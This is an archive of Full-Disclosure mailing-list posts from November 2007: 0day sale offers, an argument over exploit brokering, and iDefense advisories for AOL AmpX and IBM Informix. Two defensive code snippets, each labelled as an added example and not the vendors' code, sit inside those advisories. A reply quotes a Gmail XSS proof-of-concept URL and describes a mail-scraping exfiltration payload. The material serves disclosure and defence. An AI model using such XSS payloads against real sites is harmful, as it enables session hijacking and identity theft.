[Full-disclosure] still some 0days to sell

2007-11-09 Thread Juergen Marester
Hi,

I still have some 0days (just a few now) to sell about windows and linux.
information by e-mail.

see you,

Juergen

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] still some 0days to sell

2007-11-09 Thread Michael Bann
Ok, first off, this is FULL DISCLOSURE. Perhaps you meant to send this 
to I'm a haxor. Don't worry, common mistake.

Second, I highly doubt you have some 0days, if any at all. Perhaps a 
few bugs/buffer under/over flows, but nothing that, in the computer 
security field, would justify the title 0day.

Cheers,

Mike

Juergen Marester wrote:



Re: [Full-disclosure] Hushmail == Narqz

2007-11-09 Thread Byron Sonne
 Paul,
 This hardly means that the hushmail crew are narqz, it just means
 that they are cooperating with the law like any legitimate business
 would. 

No, it doesn't mean they're narqa, but it does mean they're spineless
pussies that eagerly sell people out. If a friend did that to you, what
would you think of them?

Take 'em down.



Re: [Full-disclosure] Hushmail == Narqz

2007-11-09 Thread Simon Smith
Ah well, if a friend did that to me...

hrm... I'd probably tar and feather him near an open flame. ;]

Byron Sonne wrote:


-- 

- simon

--
http://www.snosoft.com



[Full-disclosure] Why I hate you (and a philanthropic challenge!)

2007-11-09 Thread don bailey

Dear jackasses,

I really think you should stop saying you have zero day
to sell on Full Disclosure. Mostly because no-one really gives a
shit. Also, no-one is really interested in paying for your horrible
code. It looks worse than initd.sh. Seriously. My code sucks, but
yours is far worse. Please stop wasting our time caring what you
think.

On to my idea!

I think the next 7 (I'm being very optimistic here) zero
day bugs should be bought by people giving money to charity
organizations! We don't see enough selflessness in computer
security, so stop being a dick: help save stuff that's important.

So, here's how it should work. Post your zero day up
on full disclosure. Yes, actually disclose it. Post what
charity you are releasing the zero day for. Then, we as a
public, will PayPal that charity (no, it can't be the Save
SnoSoft and Netragard Fund) some monies. Wouldn't that be
nice? We can help the EFF, battle illegal pornography or
even support your favorite politician! Doesn't sound bad,
does it?

I will personally promise to donate up to 300$ (total, I'm not
rich) to said charities assuming that they are legal and such.

NOW GET TO WORK AND DROP SOME ZERO DAY
NO, XSS DOES NOT COUNT

Donb



Re: [Full-disclosure] Why I hate you (and a philanthropic challenge!)

2007-11-09 Thread John C. A. Bambenek, CISSP
I'll be more than happy to volunteer my charity to receive funds. :)
(Helps AIDS orphans in Tanzania get an education and otherwise
supports schools there).

j

On Nov 9, 2007 12:50 PM, don bailey [EMAIL PROTECTED] wrote:




Re: [Full-disclosure] Hushmail == Narqz

2007-11-09 Thread Micheal Espinola Jr
On Nov 9, 2007 12:57 PM, Byron Sonne [EMAIL PROTECTED] wrote:
 No, it doesn't mean they're narqa, but it does mean they're spineless
 pussies that eagerly sell people out. If a friend did that to you, what
 would you think of them?

Cooperating with a court order != being a pussy
hushmail != your friend

-- 
ME2



Re: [Full-disclosure] Why I hate you (and a philanthropic challenge!)

2007-11-09 Thread T Biehn
So will I!
Just send all funds to Western Union in Nigeria, Dr. Priest Amdul
Bhudgetwajey...

On Nov 9, 2007 2:11 PM, John C. A. Bambenek, CISSP
[EMAIL PROTECTED] wrote:
 I'll be more than happy to volunteer my charity to receive funds. :)
 (Helps AIDS orphans in Tanzania get an education and otherwise
 supports schools there).

 j





[Full-disclosure] Exploit Brokering

2007-11-09 Thread Simon Smith

[ This email is in response to all of the emails that I see with people
trying to broker exploits by advertising them on full disclosure and
other public mailing lists. ]

SNOsoft has been legitimately and legally brokering exploits since early
2000, and we're still doing it very successfully. As a matter of policy
we will not ever purchase items from careless developers, and will not
sell to careless buyers or non US based buyers... With exploit brokering
comes great responsibility and liability.

People posting emails in public forums in an attempt to sell exploits is
not only careless and irresponsible, but is also a testament to that
person's immaturity and lack of experience. Do they ever stop to think
about the potential liability? What happens if they sell to a hostile
foreign party, what could happen to them, etc...?

I think that there is a legitimate market for Exploit Brokering when it
is done properly (ethically and legally). I think that in that market
the developers should adhere to strict rules and not cross certain
boundaries. I also think that the responsible and ethical developers
should be paid fair value for their time, instead of a pathetic maximum
of $5,000.00 for a high grade item. Think about it, the average QA
Engineer makes more money per bug than the higher talent security
researcher. There's something wrong with that.

The solution to that problem is not to sell exploits to just anyone in a
public forum. That introduces too much liability to the developer,
especially if the buyer is illegitimate or hostile. The solution is to
work with legitimate established businesses in a confidential and
responsible manner.

Unfortunately for those developers that are trying to sell exploits in a
public forum, their chances of working with legitimate businesses are
gone. No way will any of the legitimate Exploit Brokers ever purchase an
item from an irresponsible developer. It's just a matter of time till
laws get passed and they end up getting thrown in jail for selling
weaponized exploits to the wrong people.

--

- simon

--
http://www.snosoft.com



Re: [Full-disclosure] Exploit Brokering

2007-11-09 Thread Thierry Zoller
Dear Simon,

SS What happens if they sell to a hostile
SS foreign party, what could happen to them, etc...?
Maybe they perceive your party as a hostile foreign party, this list is
obviously not based in the US.

The solution is to work with legitimate established businesses
in a confidential and responsible manner.
If you are responsible you surely can disclose who you are selling
them to? Are you even disclosing this to the person that you
bought them from? When not does this make you any better than
the others?

-- 
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45  2E57 28B3 75DD 0AC6 F1C7



Re: [Full-disclosure] Exploit Brokering

2007-11-09 Thread Simon Smith
Please forgive me... should I beg for mercy?

;]

Joey Mengele wrote:
 This is hardly on topic and you do not have any unique credentials 
 to validate your claims. Please refrain from writing off topic and 
 baseless editorials in the future or risk moderation. Thanks.
 
 J
 
 On Fri, 09 Nov 2007 15:22:01 -0500 Simon Smith [EMAIL PROTECTED] 
 wrote:


-- 

- simon

--
http://www.snosoft.com



Re: [Full-disclosure] Exploit Brokering

2007-11-09 Thread jf
 SNOsoft

When the first word in the first sentence in a communique is a company
name, you should take that as a warning everything that follows is a SNOsoft.


 People posting emails in public forums in an attempt to sell exploits is
 not only careless and irresponsible,

It's called the free-market.

 but is also a testament to that
 persons immaturity and lack of experience.

What, you think that when you add the variables up the only potential
answer is what you've come up with? Employing the free-market is not a
testament to anything, much less a person's level of maturity or
experience.

 Do they ever stop to think
 about the potential liability? What happens if they sell to a hostile
 foreign party, what could happen to them, etc...?

Sure, of course, you don't sell 0day to the organizations that are the enemy of
your country, that's common sense; however you put a breach of contract
provision into your agreement that disallows transfer of content to third
parties and then don't sell them to people from Guangdong. It's not
stupidity, immaturity or lack of experience, it's called due diligence.


 I think that there is a legitimate market for Exploit Brokering when it
 is done properly (ethically and legally).

I wish you people would stop putting your opinions on ethics onto other
people. I mean even business ethics does not follow what's commonly
associated with being ethical, that's why there is a special class for it
in college and it largely amounts to the questions 'is it legal?' and 'can I
get away with it?'.

In reality all your bantering about ethics and legality will result in is
that bug information and exploits become subject to restricted export/sale
legislation and then we'll be stuck with companies like yours.

I mean seriously, has it not occurred to you that not everyone in the
world is American and wants to sell their 0day to the NSA via SNOSoft?
That perhaps the conjecture that they want to do that is against their
morals and in turn does that not make you obtuse for expecting they abide
by your own personal set of ethics?


 I think

I don't care what you think, don't try to enforce your set of morals on
me; I'm sure plenty of others agree with this sentiment.

 The solution to that problem is not to sell exploits to just anyone in a
 public forum. That introduces too much liability to the developer,
 especially if the buyer is illegitimate or hostile. The solution is to
 work with legitimate established businesses in a confidential and
 responsible manner.

No, the solution is not to be stupid with your sales, you can meet people
in public forums, just be able to show due diligence that the parties you
sold to are not enemies of your country and that their intentions are not
to violate the law. Guns don't kill people, ...

By responsible, you mean doing it the way you do?


 Its just a matter of time till
 laws get passed and they end up getting thrown in jail for selling
 weaponized exploits to the wrong people.

Which is exactly what you want. Look almost everything is legal somewhere,
that means you can't stop people who wish to conduct private business.



Re: [Full-disclosure] Exploit Brokering

2007-11-09 Thread Simon Smith

First Answer:

Only work with partners that are well established, incorporated, and
have a legitimate use for the items that they want to purchase. Do not
work with individual buyers/people, there's too much liability and no
way to verify that they are actually US based. Make sure that every
single transaction is done under tight legally binding contract. Perform
background checks as necessary, etc.


Second Answer:

Same as the first one.

Obviously this is just a light summary of the process that we follow,
but it should give you an idea as to how we do business.



security curmudgeon wrote:


--

- simon

--
http://www.snosoft.com



Re: [Full-disclosure] Exploit Brokering

2007-11-09 Thread security curmudgeon

Hi Simon,

: SNOsoft has been legitimately and legally brokering exploits since early 
: 2000, and we're still doing it very successfully. As a matter of policy 
: we will not ever purchase items from careless developers, and will not 
: sell to careless buyers or non US based buyers... With exploit brokering 
: comes great responsibility and liability.
: 
: People posting emails in public forums in an attempt to sell exploits is 
: not only careless and irresponsible, but is also a testament to that 
: persons immaturity and lack of experience. Do they ever stop to think 
: about the potential liability? What happens if they sell to a hostile 
: foreign party, what could happen to them, etc...?

Can you describe SNOsoft's process for validating buyers and assuring 
they are US based? Is there any process to ensure that even though they 
are US based they do not have any ill intention toward their country? 
Just because someone has a US ID doesn't mean they were born here or not 
working for a foreign party.

jericho



[Full-disclosure] iDefense Security Advisory 11.09.07: AOL AmpX ActiveX Control Multiple Buffer Overflow Vulnerabilities

2007-11-09 Thread iDefense Labs
iDefense Security Advisory 11.09.07
http://labs.idefense.com/intelligence/vulnerabilities/
Nov 09, 2007

I. BACKGROUND

America Online's AmpX is an ActiveX control associated with AOL Radio.
It is typically used for embedding streaming audio content in web
pages. For more information visit the following URL.

http://music.aol.com/radioguide/bb/

II. DESCRIPTION

Remote exploitation of multiple buffer overflow vulnerabilities in AOL's
AmpX ActiveX control could allow attackers to execute arbitrary code
with the credentials of the user visiting a malicious website.

Several methods within the vulnerable ActiveX control (CLSID
B49C4597-8721-4789-9250-315DFBD9F525) were found to be vulnerable to
stack-based buffer overflows. In each case, variable length attacker
supplied data is copied into a fixed-size stack buffer using the
strcpy() function. Since no input validation is performed, it is
possible to corrupt stack memory, resulting in an exploitable
condition.

III. ANALYSIS

Exploitation allows an attacker to execute arbitrary code in the context
of the user viewing a malicious web page. In order to be successful, the
attacker must persuade a user with the vulnerable control installed into
viewing a malicious web page. No further interaction is required.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in version
2.6.1.11 of America Online's AmpX.dll. Other versions are suspected to
be vulnerable.

V. WORKAROUND

In order to prevent exploitation of this vulnerability, an administrator
can set the kill-bit for the vulnerable control. While this does not fix
the vulnerability, it does prevent the control from being loaded in
Internet Explorer.
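An added example, not code from iDefense or AOL: it checks whether the control named in the advisory is registered on a Windows host (and at which file version), then applies the kill-bit workaround described above. It assumes an elevated PowerShell session and the standard Internet Explorer "ActiveX Compatibility" registry keys that the kill-bit mechanism reads.

```powershell
# Added example, not iDefense's or AOL's code: audit a Windows host for the
# AmpX control named in the advisory and apply the kill-bit workaround.
# Assumptions: run from an elevated PowerShell prompt; the CLSID is the one
# from the advisory; the registry paths are the standard Internet Explorer
# "ActiveX Compatibility" keys that the kill-bit mechanism uses.

$Clsid   = '{B49C4597-8721-4789-9250-315DFBD9F525}'
$KillBit = 0x400   # Compatibility Flags bit that stops IE instantiating the control

# IE consults these keys; the Wow6432Node copy covers 32-bit IE on 64-bit Windows.
$CompatPaths = @("HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid")
if ([Environment]::Is64BitOperatingSystem) {
    $CompatPaths += "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
}

function Get-AmpXRegistration {
    # Report where the control's DLL is registered and which file version it carries.
    $keys = @(
        "Registry::HKEY_CLASSES_ROOT\CLSID\$Clsid\InprocServer32",
        "Registry::HKEY_CLASSES_ROOT\Wow6432Node\CLSID\$Clsid\InprocServer32"
    )
    foreach ($k in $keys) {
        if (-not (Test-Path $k)) { continue }
        $dll = (Get-ItemProperty -Path $k).'(default)'
        $version = $null
        if ($dll -and (Test-Path $dll)) {
            # Build the version from the numeric parts so the string format is predictable.
            $v = (Get-Item $dll).VersionInfo
            $version = '{0}.{1}.{2}.{3}' -f $v.FileMajorPart, $v.FileMinorPart, $v.FileBuildPart, $v.FilePrivatePart
        }
        [pscustomobject]@{ Key = $k; Dll = $dll; FileVersion = $version }
    }
}

function Test-KillBit {
    # True when Compatibility Flags at $Path already contains the kill-bit.
    param([string]$Path)
    if (-not (Test-Path $Path)) { return $false }
    $flags = (Get-ItemProperty -Path $Path -ErrorAction SilentlyContinue).'Compatibility Flags'
    return ($null -ne $flags) -and (($flags -band $KillBit) -eq $KillBit)
}

function Set-KillBit {
    # OR the kill-bit into Compatibility Flags, preserving any other flags already set.
    param([string]$Path)
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
    $existing = (Get-ItemProperty -Path $Path -ErrorAction SilentlyContinue).'Compatibility Flags'
    $new = ([int]$existing) -bor $KillBit
    Set-ItemProperty -Path $Path -Name 'Compatibility Flags' -Value $new -Type DWord
}

# --- Detection: is the control present, and is it the version iDefense confirmed? ---
$found = @(Get-AmpXRegistration)
if ($found.Count -eq 0) {
    Write-Output "AmpX control $Clsid is not registered on this host."
} else {
    $found | Format-Table -AutoSize | Out-String | Write-Output
    foreach ($r in $found) {
        if ($r.FileVersion -eq '2.6.1.11') {
            Write-Warning "Confirmed-vulnerable AmpX.dll version 2.6.1.11 at $($r.Dll)"
        } else {
            # The advisory suspects other versions too, so presence alone is worth flagging.
            Write-Warning "AmpX.dll present (version $($r.FileVersion)); treat as suspect."
        }
    }
}

# --- Workaround: set the kill-bit so IE refuses to load the control, installed or not ---
foreach ($p in $CompatPaths) {
    if (Test-KillBit -Path $p) {
        Write-Output "Kill-bit already set: $p"
    } else {
        Set-KillBit -Path $p
        Write-Output "Kill-bit set: $p"
    }
}
```

Setting the kill-bit on a host where the control is absent is harmless and still protects against a later install of the vulnerable version; the vendor update in section VI remains the actual fix.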

VI. VENDOR RESPONSE

An updated version of AOL Radio with enhanced security features is now
available. AOL recommends that you download and install the update to
get the best and most secure performance from AOL Radio. If you use AIM
or other AOL software, you will automatically receive a prompt to update
AOL Radio and you do not need to download and install this update now.
Otherwise, please download the update from the URL below and
double-click on the file to finish updating AOL Radio:

http://radaol-prod-web-rr.streamops.aol.com/mediaplugin/unagi_patch.exe

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2007-5755 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

04/24/2007  Initial vendor notification
04/24/2007  Initial vendor response
11/09/2007  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2007 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.



Re: [Full-disclosure] Exploit Brokering

2007-11-09 Thread Simon Smith

Thierry, my comments are below.

Thierry Zoller wrote:
 Dear Simon,
 
 Well if it wasn't obvious enough let me rephrase.
 
 SS What happens if they sell to a hostile
 SS foreign party, what could happen to them, etc...?
 Maybe they perceive your party as a hostile foreign party, this list is
 obviously not based in the US.
 SS What's your point?
 I think my point is very clear, those trying to find a buyer on this
 list (who you are directly speaking to in your post) are
 maybe not interested in selling to US based parties. You assume they
 are.

Right, I did make that assumption and that was purely based on my
perspective as a US based broker. There is no reason why the same kind
of business can't be done in other countries. I was thinking strictly
about my liabilities as a US based person and my restrictions only.
The US is only one country out of many.
 
 To make this even clearer :
 SSDo they ever stop to think
 SS about the potential liability? What happens if they sell to a hostile
 SSforeign party, what, what could happen to them, etc...?
 Maybe the hostile foreign party for them is the USA.

Quite possibly and I could think of many reasons why people would think
so, especially with our current president in office.

 The solution is to work with legitimate established businesses
 in a confidential and responsible manner.
 If you are responsible you surely can disclose who you are selling
 them to? 
 SS That would be irresponsible.
 Why would disclosing who you are selling them to be irresponsible ?
 You argue that those seeking to sell over FD are careless and
 irresponsible. Now why if they sell them to you makes them less
 careless and irresponsible since they still don't know with
 whom the information will end up with.

Again from my perspective it would be irresponsible as we have
confidentiality agreements in place with partners. It might not be
irresponsible for others to disclose that information.

 
 Are you even disclosing this to the person that you
 bought them from ? When not does this make you any better than
 the others ?
 SS I have no idea what you are asking me here.
 Are you disclosing _to the person_ you bought the bugs from, to whom
 you are going to sell them ? If not I don't see the interest why they
 should choose you over others for ethical reasons.

Same answer as above.

I should apologize because the initial email sounded very arrogant. With
that said, there is still responsible brokering and irresponsible
brokering. Selling exploits to just anyone is irresponsible.





--

- simon

--
http://www.snosoft.com



Re: [Full-disclosure] Exploit Brokering

2007-11-09 Thread Thierry Zoller
Dear Simon,

Well if it wasn't obvious enough let me rephrase.

 SS What happens if they sell to a hostile
 SS foreign party, what could happen to them, etc...?
 Maybe they perceive your party as a hostile foreign party, this list is
 obviously not based in the US.
SS What's your point?
I think my point is very clear, those trying to find a buyer on this
list (who you are directly speaking to in your post) are
maybe not interested in selling to US based parties. You assume they
are.

To make this even clearer :
SSDo they ever stop to think
SS about the potential liability? What happens if they sell to a hostile
SSforeign party, what, what could happen to them, etc...?
Maybe the hostile foreign party for them is the USA.

 The solution is to work with legitimate established businesses
 in a confidential and responsible manner.
 If you are responsible you surely can disclose who you are selling
 them to? 
SS That would be irresponsible.
Why would disclosing who you are selling them to be irresponsible ?
You argue that those seeking to sell over FD are careless and
irresponsible. Now why if they sell them to you makes them less
careless and irresponsible since they still don't know with
whom the information will end up with.

 Are you even disclosing this to the person that you
 bought them from ? When not does this make you any better than
 the others ?
SS I have no idea what you are asking me here.
Are you disclosing _to the person_ you bought the bugs from, to whom
you are going to sell them ? If not I don't see the interest why they
should choose you over others for ethical reasons.

-- 
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45  2E57 28B3 75DD 0AC6 F1C7



Re: [Full-disclosure] Exploit Brokering

2007-11-09 Thread Simon Smith

No doubt...

[EMAIL PROTECTED] wrote:
 On Fri, 09 Nov 2007 16:38:35 EST, Simon Smith said:
 Thierry Zoller wrote:
 Maybe the hostile foreign party for them is the USA.
 Quite possibly and I could think of many reasons why people would think
 so, especially with our current president in office.
 
 Note that given the recent approval polls for said president, you can
 probably strike "foreign" from Thierry's comment and it still be correct...


- --

- - simon

- --
http://www.snosoft.com

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.5 (Darwin)

iD8DBQFHNNYpf3Elv1PhzXgRAnSOAJwNe3L78ON7kcQL3QjJefJPS+wwlwCeN+kC
ydvhgAGKVrHedbSJUhzlmio=
=0Hxy
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Exploit Brokering

2007-11-09 Thread Thierry Zoller
Dear Simon,

SS Selling exploits to just anyone is irresponsible.
Fully agree, I interpreted your initial post as being US centric and
based on ethical judgement, hence my comments. No hard feelings =)




-- 
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45  2E57 28B3 75DD 0AC6 F1C7

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] iDefense Security Advisory 11.09.07: IBM Informix Dynamic Server DBLANG Directory Traversal Vulnerability

2007-11-09 Thread iDefense Labs
iDefense Security Advisory 11.09.07
http://labs.idefense.com/intelligence/vulnerabilities/
Nov 09, 2007

I. BACKGROUND

IBM Corp.'s Informix Dynamic Server is an online transaction processing
data server. It contains several set-uid root binaries. For more
information, visit the product homepage at the following URL.

http://www-306.ibm.com/software/data/informix/ids/

II. DESCRIPTION

Local exploitation of a directory traversal vulnerability in IBM Corp.'s
Informix Dynamic Server allows attackers to elevate privileges to root.

This vulnerability exists due to insufficient checking for directory
traversal sequences when processing the DBLANG environment variable. By
using values containing directory traversal specifiers, such as "../",
an attacker can cause set-uid binaries to use Native Language Support
(NLS) message files under their control.

III. ANALYSIS

Exploitation allows local attackers to gain root privileges. In order to
exploit this vulnerability, an attacker would need access to execute one
of the set-uid root binaries that utilizes the DBLANG environment
variable.

Since an attacker can control NLS message file data, they are able to
pass arbitrary format string arguments to the variable argument
function printf(3). Consequently, this vulnerability can be exploited
using publicly known format string exploitation techniques.

When attempting to exploit this vulnerability, it is likely that an
attacker would try to execute code within areas of memory that are
considered data. As such, NX, XD, exec-shield, PaX and other data
execution prevention technologies can decrease the likelihood of
success.
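
The check that closes the traversal half of this bug, as an added example
that is neither IBM's nor iDefense's code: a locale name taken from the
environment is allow-listed before a path is built from it, and the
resolved path is then checked to still lie under the catalog base. The
layout <base>/<DBLANG>/<catalog> and the catalog name "example.iem" are
assumptions (the advisory does not give the real Informix layout). The
format-string half is a separate fix: a catalog string must be passed to
printf(3) as an argument, never as the format, and this check does not
replace that.

```python
import os
import re
import tempfile

# Assumed catalog layout, not taken from the advisory: <base>/<DBLANG>/<catalog>.
# <base> is fixed at build time by the set-uid program; the attacker controls
# only the DBLANG value.
_LOCALE_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_.\-]{0,63}$")


def locale_name_ok(dblang):
    """Allow-list on the locale name itself. Path separators, NUL, '..' and
    empty values (e.g. '../../tmp/evil' or '/tmp/evil') fail here before
    any path is built."""
    return bool(dblang) and _LOCALE_RE.match(dblang) is not None


def nls_catalog_path(dblang, catalog, base):
    """Resolved path of <catalog> for locale <dblang>, or None if it would
    fall outside <base>. realpath() follows symlinks, so a locale directory
    that is a link to somewhere outside <base> is rejected too, which the
    allow-list alone cannot see."""
    if not locale_name_ok(dblang):
        return None
    base_real = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base_real, dblang, catalog))
    if os.path.commonpath([base_real, candidate]) != base_real:
        return None
    return candidate


def demo():
    """Constructed fixture: a temporary catalog tree with one honest locale
    and one locale directory that is a symlink pointing outside the base.
    Returns the resolved base and the outcome for four DBLANG values."""
    root = tempfile.mkdtemp()
    base = os.path.join(root, "msg")
    outside = os.path.join(root, "outside")
    os.makedirs(os.path.join(base, "en_us.8859-1"))
    os.makedirs(outside)
    os.symlink(outside, os.path.join(base, "evil"))
    results = {
        "honest":    nls_catalog_path("en_us.8859-1", "example.iem", base),
        "traversal": nls_catalog_path("../../tmp/evil", "example.iem", base),
        "absolute":  nls_catalog_path("/tmp/evil", "example.iem", base),
        "symlink":   nls_catalog_path("evil", "example.iem", base),
    }
    return os.path.realpath(base), results


if __name__ == "__main__":
    for name, path in demo()[1].items():
        print("%-10s %s" % (name, path or "REJECTED"))
```

The two checks are deliberately independent: the allow-list rejects the
obvious traversal strings without touching the file system, and the
realpath containment catches what the allow-list cannot, such as a locale
directory that is a symlink. In a set-uid program the same result should
also be re-checked on the opened descriptor, since a path check alone is
racy.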

IV. DETECTION

iDefense confirmed the existence of this vulnerability in IBM Corp.'s
Informix Dynamic Server version 10.00 UC6TL installed on a Linux
system. Other versions are also suspected as vulnerable. Versions for
other supported Unix systems should also be considered vulnerable.

V. WORKAROUND

Removing the set-uid bit from all programs included with Informix will
prevent exploitation. However, doing so may also disable functionality.

VI. VENDOR RESPONSE

IBM Corp. has addressed this vulnerability within version 10.00.xC7W1 of
Informix Dynamic Server. For more information, visit the following URL.

http://www-1.ibm.com/support/docview.wss?uid=swg27011082

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2007-5670 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

09/01/2007  Initial vendor notification
09/13/2007  Initial vendor response
11/06/2007  IBM Released 10.00.xC7W1
11/09/2007  Public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2007 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Exploit Brokering

2007-11-09 Thread Valdis . Kletnieks
On Fri, 09 Nov 2007 16:38:35 EST, Simon Smith said:
 Thierry Zoller wrote:
  Maybe the hostile foreign party for them is the USA.
 
 Quite possibly and I could think of many reasons why people would think
 so, especially with our current president in office.

Note that given the recent approval polls for said president, you can
probably strike "foreign" from Thierry's comment and it still be correct...


pgp4Tuw22f1BT.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Exploit Brokering

2007-11-09 Thread Simon Smith
No worries man, I should have been more clear.

Thierry Zoller wrote:
 Dear Simon,
 
 SS Selling exploits to just anyone is irresponsible.
 Fully agree, I interpreted your initial post as being US centric and
 based on ethical judgement, hence my comments. No hard feelings =)
 
 
 
 


-- 

- simon

--
http://www.snosoft.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Gmail 0day

2007-11-09 Thread Adrian P
Hello Juergen,

With all due respect, is it that hard to see that gaining access to a
Gmail session can lead to your identity being stolen?

Nowadays your webmail account means your online life/presence. Let's
have a walk-through attack, shall we?

1. Your Gmail session is hijacked (i.e.: via the XSS PoC posted on FD).

2. Attacker searches for "password" in 'Inbox'/'Sent Mail'.

- How many times have you clicked on "Forgot password" on MULTIPLE
online accounts and the password (whether a new pass or the original
one) emailed to you has not been changed from the time you got the
"forgotten password" email?

- How many users have emailed passwords to themselves so that they
don't forget?

- How many users use the same password on MULTIPLE online accounts
(including merchant/e-commerce accounts)?

- How many users have clicked on "remember credit card details" so
that they don't have to re-enter their CC data every time they perform
an online transaction?

- Did you forget to disable your Gtalk chat history? (Gtalk is still
within the google.com domain.)

- Have you saved anything personal on other services such as Google
docs/calendar/notebook? (or any other google.com service that doesn't
require you to re-login once authenticated)

3. For most victims, this leads to a compromise of his/her online identity.

If you fail to see the problem, then please think before you complain
about "damn, right now 0day are fucking XSS".

Posting an XSS PoC that opens an alert box doesn't have much merit
perhaps. However, this is the equivalent of saying: "hey, I can cause
a BO condition. If you send X parameter with 500 bytes/chars or more,
then EIP is overwritten and the attacked service crashes". Now compare
that to actually compromising the server via the buffer overflow
vulnerability. That's a DIFFERENT STORY.

Same thing goes for any XSS. Now say, screw a cookie theft exploit for
the Gmail XSS! (pardon my French). Make something more clever!
Perhaps you want a payload that scrapes all the victim's emails which
contain keywords such as 'password', 'private', 'admin', and so on.
Then, all the captured data is submitted to the attacker's site in the
background (nothing suspicious is visually happening from the victim's
point of view).

Sure Gmail has CSRF protection, but that can be bypassed via XSS.
After all, anti-CSRF tokens can be grabbed if URLs can be accessed
within the security context of the target domain (which is possible
via XSS).

If you consider all the aforementioned thoughts plus the fact that
Gmail is one of the most popular webmail services, then you should be
able to understand the power of an XSS vuln on google.com!

Regards,
AP.

On Nov 8, 2007 8:55 PM, Juergen Marester [EMAIL PROTECTED] wrote:
 wow ! 0day !
 damn, right now 0day are fucking XSS ...




 On 11/8/07, silky [EMAIL PROTECTED] wrote:
  worked for me minutes after it was posted. seems fixed now.
 
  On 11/9/07, crazy frog crazy frog  [EMAIL PROTECTED] wrote:
   i tested it on gmail latest version,itsnot working for me?
  
   On Nov 8, 2007 7:04 AM, Scripter Hack [EMAIL PROTECTED]  wrote:
    There is an HTML injection vulnerability in https://www.google.com.
    It is very critical, you can get the cookie to login into gmail or
    other service.
    
    POC:
    
    https://www.google.com/accounts/ServiceLogin?service=mail&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&ltmpl=default&ltmplcache=2&passive=true&l#";</script><script>alert('xss')</script>1-=1
    
    More: http://xss2root.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
   
  
  
  
   --
   advertise on secgeeks?
   http://secgeeks.com/Advertising_on_Secgeeks.com
   http://newskicks.com
  
   ___
   Full-Disclosure - We believe in it.
   Charter: http://lists.grok.org.uk/full-disclosure-charter.html
   Hosted and sponsored by Secunia - http://secunia.com/
  
 
 
  --
  mike
  http://lets.coozi.com.au/
 
  ___
  Full-Disclosure - We believe in it.
  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
  Hosted and sponsored by Secunia - http://secunia.com/
 


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/




-- 
pagvac
gnucitizen.org, ikwt.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [SECURITY] [DSA 1405-1] New zope-cmfplone packages fix arbitrary code execution
